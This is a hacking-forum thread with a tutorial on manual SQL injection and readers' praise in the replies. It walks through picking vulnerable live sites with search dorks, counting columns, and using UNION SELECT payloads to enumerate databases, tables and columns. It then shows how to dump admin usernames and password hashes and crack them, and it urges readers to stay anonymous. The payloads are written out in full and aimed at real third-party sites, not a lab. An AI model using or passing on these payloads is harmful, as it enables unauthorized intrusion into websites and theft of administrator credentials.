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Tutorial Manual SQL Injection filter_list
Manual SQL Injection #1
Manual SQL Injection.

Step 1: Finding a target.
For those new to web hacking, using google dorks can really help. Here's a few:
(Or scan for vulns on a specific site.)
Click a link, let it load. If it properly loads, put a ' at the end, you will get something similar to this:
[Image: iAtBE.jpg]
[Image: QIn9S.jpg]
Is exploitable!
Step 2: Find Number of Columns.

Now, take away the ' and add: order by 5--
If you get an error, cool, keep reading anyways. If not, read on-you have to.
Keep adding 5 until you get a screen similar to this:
[Image: gbtLX.jpg]

Next, between the working 5 and the nonworking 5, bump the order by number up by 1 each time (order by 6--, order by 7--, etc.) until it doesn't load or gives an error. Of course, with my luck, I got the error ON error 10. Therefore, there is 9 columns!

Step 3: Find which column is vulnerable.

After id=, put a -
This is important!
Then, type in after the number, union all select 1,2,3,4,5,6,7,8,9--
Obviously, if your site only has 4 columns, it would be union all select 1,2,3,4
You'll be told which column is vulnerable directly.

[Image: Qyqwg.jpg]

Step 4: Get the MySQL version

For the vulnerable column, replace the number with @@version


[Image: wyLyA.jpg]

From now on, examples will be shown as mine, just modify this to work with your site!

Step 5: Get Databases

Change your info to: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--

[Image: 5stxB.jpg]

Then change group_concat(schema_name) to database(), which will give you your current database.

Step 6: Get Tables


union all select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--

Should give you the table list. Imgur stopped working, so start thinking!;D

I got a table called admin. Hell yes!

Step 7: Get Columns
union all select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()--

I got some columns, one called adminUser and another called adminPassword.

Step 8: Admin Logins!
You're almost done!

union all select 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--

Remember, columns in parentheses, table at end

If you get strings of what looks to be randomized letters and numbers, this is md5, so just google "decrypt md5 online" or get Cain and Abel

From there, I think you know what to do.Wink

This is for educational purposes only. You're responsible for what you do, but remember to stay anonymous!



RE: Manual SQL Injection #2
You should put your commands in code but good tutorials and nice that you put pictures.
[Image: lupado1c3f2.png]


RE: Manual SQL Injection #3
It would have been nice if there were images throughout the whole tutorial, but it's still helpful.


RE: Manual SQL Injection #4
Nice tutorial, but I should add those last few command line's in if I were you. To make it look more organized.

Anyway, Keep it up!
[Image: bAMEI93.jpg]

Jabber: charon@exploit.im


RE: Manual SQL Injection #5
Thanks for the tutorial despite what the users above have said.


RE: Manual SQL Injection #6
Great tutoiral. This is the morst common method though. I would like to know how to inject a specific site. I mean anyone and google this information and hack a small site, but it takes a better hacker to hack a specific site with SQL or even XSS.
[Image: sign.jpg]
A Proud Father and Supporter of the AF Radio!


RE: Manual SQL Injection #7
(12-04-2012, 07:45 AM)†Mescaline† Wrote: Thanks for the tutorial despite what the users above have said.

We are not saying its bad or anything. Just giving our opinion on the tut. Tutorial is good...
[Image: lupado1c3f2.png]


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